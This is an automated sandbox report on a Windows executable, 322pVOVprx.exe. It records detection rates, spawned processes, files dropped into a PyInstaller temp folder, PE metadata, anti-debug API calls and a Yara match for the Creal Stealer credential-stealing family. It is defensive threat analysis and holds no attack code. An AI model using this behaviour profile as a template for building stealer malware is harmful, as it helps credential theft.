Windows Analysis Report
322pVOVprx.exe

Source: 322pVOVprx.exe	ReversingLabs: Detection: 42%
Source: 322pVOVprx.exe	Virustotal: Detection: 15%

Source: C:\Users\user\Desktop\322pVOVprx.exe

File read: C:\Users\user\Desktop\322pVOVprx.exe

Source: 322pVOVprx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\322pVOVprx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exe
Source: C:\Users\user\Desktop\322pVOVprx.exe	Process created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exe
Source: C:\Users\user\Desktop\322pVOVprx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\322pVOVprx.exe	Process created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exe	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior

Source: C:\Users\user\Desktop\322pVOVprx.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI60602

Yara detected Creal Stealer

Source: classification engine

Classification label: mal64.troj.spyw.winEXE@6/78@12/7

Source: C:\Users\user\Desktop\322pVOVprx.exe

Code function: 0_2_00007FF6E5AB74B0 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF6E5AB74B0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01

Source: C:\Users\user\Desktop\322pVOVprx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 322pVOVprx.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 322pVOVprx.exe

Static file information: File size 13686532 > 1048576

Source: 322pVOVprx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 322pVOVprx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 322pVOVprx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 322pVOVprx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 322pVOVprx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 322pVOVprx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 322pVOVprx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 322pVOVprx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: 322pVOVprx.exe, 00000000.00000003.298846422.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: 322pVOVprx.exe, 00000000.00000003.294685663.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: 322pVOVprx.exe, 00000000.00000003.294101171.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_multiprocessing.pdb source: 322pVOVprx.exe, 00000000.00000003.294578143.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: 322pVOVprx.exe, 00000000.00000003.294848493.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 322pVOVprx.exe, 00000000.00000003.293726499.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: 322pVOVprx.exe, 00000000.00000003.294784208.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_asyncio.pdb source: 322pVOVprx.exe, 00000000.00000003.293967842.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: 322pVOVprx.exe, 00000000.00000003.299239908.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: 322pVOVprx.exe, 00000000.00000003.294419997.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp

Source: 322pVOVprx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 322pVOVprx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 322pVOVprx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 322pVOVprx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 322pVOVprx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5B010E4 push rcx; retn 0000h		0_2_00007FF6E5B010ED
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5B010CC push rbp; retn 0000h		0_2_00007FF6E5B010CD

Source: 322pVOVprx.exe	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: python311.dll.0.dr	Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]

Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\322pVOVprx.exe

Code function: 0_2_00007FF6E5AB3DF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF6E5AB3DF0

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\322pVOVprx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5AC6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6E5AC6714
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5AB7820 FindFirstFileExW,FindClose,	0_2_00007FF6E5AB7820
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5AC6714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6E5AC6714
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5AD09B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6E5AD09B4

Source: 322pVOVprx.exe, 00000001.00000003.306010144.0000023E95988000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: 322pVOVprx.exe, 00000001.00000003.344669679.0000023E957A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309636596.0000023E957C4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.306937511.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370175258.0000023E957DA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347844833.0000023E957AD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349323854.0000023E957B5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349356307.0000023E957B9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353103508.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307778546.0000023E957C6000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349928799.0000023E957C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>

Source: C:\Users\user\Desktop\322pVOVprx.exe

Code function: 0_2_00007FF6E5ABB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6E5ABB69C

Source: C:\Users\user\Desktop\322pVOVprx.exe

Code function: 0_2_00007FF6E5AD25A0 GetProcessHeap,

0_2_00007FF6E5AD25A0

Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5ABB180 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	0_2_00007FF6E5ABB180
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5ABB69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6E5ABB69C
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5ABAE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6E5ABAE00
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5ABB880 SetUnhandledExceptionFilter,	0_2_00007FF6E5ABB880
Source: C:\Users\user\Desktop\322pVOVprx.exe	Code function: 0_2_00007FF6E5AC9AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6E5AC9AE4

Source: C:\Users\user\Desktop\322pVOVprx.exe	Process created: C:\Users\user\Desktop\322pVOVprx.exe C:\Users\user\Desktop\322pVOVprx.exe			Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"			Jump to behavior

Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\322pVOVprx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformation	Jump to behavior
